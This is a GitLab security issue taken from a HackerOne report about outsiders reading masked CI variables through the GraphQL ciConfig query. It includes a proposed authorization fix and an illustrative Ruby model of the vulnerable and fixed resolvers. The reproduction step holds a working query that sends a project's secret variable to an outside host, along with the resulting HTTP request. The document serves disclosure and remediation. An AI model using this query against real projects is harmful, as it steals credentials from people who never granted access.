Backend: Unallowed users can read masked CI variables of Gitlab projects
**[HackerOne report #1511133](https://hackerone.com/reports/1511133)** by `shells3c` on 2022-03-14, assigned to @dcouture:
## Report
##### Summary
External users/users without privilege/guests (depends on project visibility) can access CI variables of a GitLab project using GraphQL. The table below explains all situations in which a user can access CI variables:
| User role \ Project visibility | Public Project | Internal Project | Private Project |
| --------------- | ------------- | --------------- | --------------- |
| External user | Yes | No | No |
| User | Yes | Yes | No |
| Guest | Yes | Yes | Yes |
##### Steps to reproduce
1. Create a project, then create a masked CI variable in the project named `PASSWORD`, disable **Protect variable** and enable **Mask variable**
2. From another account (no role in the project), run the following query in the GraphQL Explorer
```graphql
{
  ciConfig(
    projectPath: "dcouture/public_project"
    content: "include: https://[redacted]/$VARIABLE_NAME.yaml"
  ) {
    errors
  }
}
```
3. The server at `example.com` will receive the following request
```http
GET /[YOUR PASSWORD HERE].yaml HTTP/1.0
Host: [redacted]
Connection: close
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: */*
User-Agent: Ruby
```
##### What is the current *bug* behavior?
GraphQL operation `getCiConfigData` loads all CI variables of the project, including custom ones, in the background.
##### What is the expected *correct* behavior?
GraphQL operation `getCiConfigData` shouldn't be able to access the project's custom variables.
##### Output of checks
This bug happens on GitLab.com
#### Impact
Accessing CI variables, including sensitive masked variables, of GitLab projects without permission.
## Proposal
Update `Resolvers::Ci::ConfigResolver` to authorize using the `create_pipeline` policy.
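The following is an added example, not GitLab's code, that models the proposed fix in plain Ruby: a config resolver that expands project variables into submitted CI content is shown in the shape of the reported bug (gated only on reading the project, which the report's visibility table allows for outsiders and guests) and in the proposed shape (gated on a `create_pipeline` policy). `User`, `Project`, `Policy`, `ConfigResolver`, the role ranks and the sample project and variable values are all hypothetical stand-ins constructed for the example.

```ruby
# Hypothetical stand-ins for GitLab's user, project and policy objects; none of
# these names are GitLab's own. Role ranks mirror GitLab's role ladder (assumption).
ROLE_RANK = { none: 0, guest: 10, reporter: 20, developer: 30, maintainer: 40 }.freeze

User = Struct.new(:name, :external)

Project = Struct.new(:path, :visibility, :members, :variables) do
  # Role the user holds in this project, :none for non-members.
  def role_of(user)
    members.fetch(user.name, :none)
  end

  # Visibility rules from the report's table: public is open to everyone,
  # internal to non-external users, private to members only.
  def readable_by?(user)
    case visibility
    when :public   then true
    when :internal then !user.external || role_of(user) != :none
    when :private  then role_of(user) != :none
    else false
    end
  end
end

module Policy
  # Assumption: creating pipelines needs the developer role or above.
  def self.can?(user, ability, project)
    case ability
    when :read_project    then project.readable_by?(user)
    when :create_pipeline then ROLE_RANK.fetch(project.role_of(user)) >= ROLE_RANK[:developer]
    else false
    end
  end
end

class AuthorizationError < StandardError; end

module ConfigResolver
  VARIABLE = /\$(?<name>[A-Z_][A-Z0-9_]*)/

  # Shape of the reported bug: reading the project is the only gate, so every
  # viewer gets the content with project variables substituted into it.
  def self.resolve_unsafe(user, project, content)
    raise AuthorizationError, project.path unless Policy.can?(user, :read_project, project)
    expand(content, project.variables)
  end

  # Proposed fix: authorize against create_pipeline before touching variables,
  # so only users who could run a pipeline with them get the expansion.
  def self.resolve(user, project, content)
    raise AuthorizationError, project.path unless Policy.can?(user, :create_pipeline, project)
    expand(content, project.variables)
  end

  # Substitute $NAME with the project's variable; leave unknown names intact.
  def self.expand(content, variables)
    content.gsub(VARIABLE) { |m| variables.fetch(Regexp.last_match[:name], m) }
  end

  # Convenience for checks: the expanded content, or :denied when unauthorized.
  def self.outcome(user, project, content)
    resolve(user, project, content)
  rescue AuthorizationError
    :denied
  end
end

# Constructed sample data (not a real project or secret).
SAMPLE_PROJECT = Project.new(
  'acme/public_project', :public,
  { 'alice' => :developer, 'bob' => :guest },
  { 'PASSWORD' => 'example-secret-value' }
).freeze
SAMPLE_CONTENT = "deploy:\n  script: ./deploy.sh $PASSWORD $UNSET".freeze

if $PROGRAM_NAME == __FILE__
  outsider = User.new('mallory', false)
  puts "unsafe, outsider: #{ConfigResolver.resolve_unsafe(outsider, SAMPLE_PROJECT, SAMPLE_CONTENT).inspect}"
  puts "fixed,  outsider: #{ConfigResolver.outcome(outsider, SAMPLE_PROJECT, SAMPLE_CONTENT).inspect}"
  puts "fixed,  alice:    #{ConfigResolver.outcome(User.new('alice', false), SAMPLE_PROJECT, SAMPLE_CONTENT).inspect}"
end
```

The design point is that the authorization check must match the sensitivity of what the resolver computes, not merely of the object it is attached to: a public project is readable by anyone, but the expanded configuration carries the project's variables, so the gate has to be the ability that already implies access to them.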